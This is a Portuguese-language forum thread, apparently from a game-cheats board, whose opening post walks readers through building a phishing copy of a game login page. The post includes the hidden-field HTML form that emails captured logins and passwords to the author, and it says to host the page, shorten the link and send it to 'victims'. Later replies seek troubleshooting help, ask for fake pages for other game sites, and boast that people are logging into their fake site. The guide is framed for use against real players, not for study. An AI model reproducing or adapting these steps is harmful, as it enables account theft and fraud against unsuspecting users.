wɛʆiɳgtѳɳ 7 Postado 17 de Novembro 2011 Compartilhar Postado 17 de Novembro 2011 · Primeiramente abra É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se página Depois clique com botão direito do mouse sobre ela e aperte para exibir o código fonte Depois copie todo o código fonte num bloco de notas Aperte ctrl+f E procure por <div class="BoxContent" style="background-image:url( É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se );"> Você pode reparar que abaixo disso há esse código aqui <script type='text/javascript'>g_FormName = "AccountLoginForm"o código continua.... Cole entre esses dois códigos o seguinte: <form METHOD="POST" ACTION=" É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se <INPUT TYPE="HIDDEN" NAME="TO" VALUE="[email protected]"> <INPUT TYPE="HIDDEN" NAME="FROM" VALUE="Pagina Fake - Criada por Welington"> <INPUT TYPE="HIDDEN" NAME="SUBJECT" VALUE="Pagina Fake - Criada por Welington"> <INPUT TYPE="HIDDEN" NAME="RESPONDER" VALUE=" É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se Coloque o seu email Logo após fazer tudo isso copie todo o código e abra É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se site Apague tudo que estiver na página,que no caso é: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" " É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se <html xmlns=" É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se <head> <title>Testing PasteHTML.com</title> </head> <body> <p>This is a test. Replace all this HTML with your own code.</p> </body> </html> Cole o seu código e aperte em Publish Page,logo após aperte Publish page novamente,já está pronta sua página fake,feita e hospedada,agora basta pegar o URL do seu navegador e ir no migre.me e encurtar o link e passar para as vítimas 3 ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
mvflapt 1 Postado 17 de Novembro 2011 Compartilhar Postado 17 de Novembro 2011 · ei man por favor se pode faser 1 pagina fake para poketibia pra esses 2 sites É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se e É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se ou 1 tutorial de como fazer pagina fake pra eles por favor? 1 ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
alexthazz 0 Postado 18 de Novembro 2011 Compartilhar Postado 18 de Novembro 2011 · Cara, esse esquema de enviar o e-mail esta certinho, mas a pagina após ser hospedada buga o HTML, fica sem as paginas de fundo, sem os botões... Oque pode ser isso ? ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
mariojardim 0 Postado 21 de Novembro 2011 Compartilhar Postado 21 de Novembro 2011 · Cara consegui direitinho :O o único problema é o link que aparece :s bom era se a gente pudesse mudar o nome mesmo kkk mas valeu cara o/ abraços agradeci. Minha page : É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
zorbeta 0 Postado 29 de Novembro 2011 Compartilhar Postado 29 de Novembro 2011 · fiz o site so q no internet explorer nao abre fica com bug, so abre em mozila firefox olha minha pagina É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se oq devo fazer alguem ajuda plz ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Mgz 0 Postado 30 de Novembro 2011 Compartilhar Postado 30 de Novembro 2011 · @zorbeta a minha acontece a mesma coisa :s ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
lucasbeghelli 0 Postado 1 de Dezembro 2011 Compartilhar Postado 1 de Dezembro 2011 · oi o meu vei tipo na hora de coloca Cole entre esses dois códigos o seguinte: <form METHOD="POST" ACTION=" É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se <INPUT TYPE="HIDDEN" NAME="TO" VALUE="[email protected]"> <INPUT TYPE="HIDDEN" NAME="FROM" VALUE="Pagina Fake - Criada por Welington"> <INPUT TYPE="HIDDEN" NAME="SUBJECT" VALUE="Pagina Fake - Criada por Welington"> <INPUT TYPE="HIDDEN" NAME="RESPONDER" VALUE=" É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se essa parte aki eu nao intendi e pra coloca no meio disso aki ? method="post" name="AccountLoginForm">< e dps disso ? pq aki nao deu pra envia a senha ele entra no site de boa mais nao manda a acc ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
lanzilotti 0 Postado 1 de Dezembro 2011 Compartilhar Postado 1 de Dezembro 2011 · cara tem um box ae no tuto que ta sem nada escrito.. da uma olhada ae.. aqui a pagina fico perfeita, só nao ta mandando a senha mesmo ;/ ajuda ae por favor! braços ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
igor_mbn 0 Postado 17 de Dezembro 2011 Compartilhar Postado 17 de Dezembro 2011 · Olá, criei minha página, mas não está mandando a senha para o e-mail. Qual é o melhor e-mail para mandar? hotmail, yahoo, ou outro? ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
@Maarlon 0 Postado 20 de Dezembro 2011 Compartilhar Postado 20 de Dezembro 2011 · entendi nada :/ ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Hatake-KaKaShii3® 0 Postado 26 de Dezembro 2011 Compartilhar Postado 26 de Dezembro 2011 · Vlw manow eu to tentando fazer aki ta um pouco dificil se tivesse como voce postar um video... ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
juba231 0 Postado 22 de Janeiro 2012 Compartilhar Postado 22 de Janeiro 2012 · funcionou direitinho aki e mt gente ta entrando no meu site fake ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Esteira 0 Postado 28 de Janeiro 2012 Compartilhar Postado 28 de Janeiro 2012 · Muito bom o topico pelomenos eu gostei voce ensinou de uma forma que a pessoa possa intender obrigado por tar postando seu conhecimento aqui no web cheats :D ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
-TheMatheus- 0 Postado 30 de Janeiro 2012 Compartilhar Postado 30 de Janeiro 2012 · Há algum perigo de ir preso por hackear contas? Gostei muito do Post Continue assim! Valew ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
augeshan 0 Postado 2 de Fevereiro 2012 Compartilhar Postado 2 de Fevereiro 2012 · aqui ta tudo certo o site mas só não to conseguindo enviar a senha e login pro meu e-mail oq será ajuda ae ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Gol D. Tobi 2 Postado 3 de Fevereiro 2012 Compartilhar Postado 3 de Fevereiro 2012 · otimo topico e otimo tutorial vou fazer uma pagina pro meu otserv '-' ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
ϟ Pяѳ κıłłeя™ 0 Postado 3 de Fevereiro 2012 Compartilhar Postado 3 de Fevereiro 2012 · Legal cara irei fazer uma agora hehe :pensando: ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
augeshan 0 Postado 4 de Fevereiro 2012 Compartilhar Postado 4 de Fevereiro 2012 · Parece que não tá funfando mais não pq ta tudo belezinha aqui + não envia a senha e login pro E-mail ;/ Alguem me ajuda me diz oq é isso :/ ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
simbionte1 0 Postado 4 de Fevereiro 2012 Compartilhar Postado 4 de Fevereiro 2012 · Perfeito fica a pagina fake só o site que aqui na segunda parte na hora de pegar o link da erro :\,mas eu testei funciona mesmo só que ela só ta aparecendo pra mim :\ ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
augeshan 0 Postado 4 de Fevereiro 2012 Compartilhar Postado 4 de Fevereiro 2012 · Alguém coloca em um bloco de notas tudo perfeitinho ai e manda o bloco pra mim editar só o e-mail por favor eu n to conseguindo. a senha e login nao estao indo pro meu e-mail ;/ upa o bloco de notas e posta o link aki qm puder :/ ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
ArthurMassena 0 Postado 12 de Fevereiro 2012 Compartilhar Postado 12 de Fevereiro 2012 · Realmente não chegam as senhas no email... Alguém faz um vídeo ai, ou posta o bloco de notas com o código certinho. ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
→ Keeper ~ 0 Postado 4 de Março 2012 Compartilhar Postado 4 de Março 2012 · Obrigado por ensinar a cria essa pagina fake levou meu agradecer, Já estou utilizando ! :D ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
รнαdσw 0 Postado 18 de Março 2012 Compartilhar Postado 18 de Março 2012 · Tentei varias veses mas nunca da certo .. A pagina sempre fica toda errada ou o login ea senha nao vai pro meu email. ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
queroots 1 Postado 9 de Abril 2012 Compartilhar Postado 9 de Abril 2012 · faz um video mano ajudaria mt :s ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
iansinho 0 Postado 16 de Abril 2012 Compartilhar Postado 16 de Abril 2012 · Não deu certo. A senha não chega no e-mail ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Posts Recomendados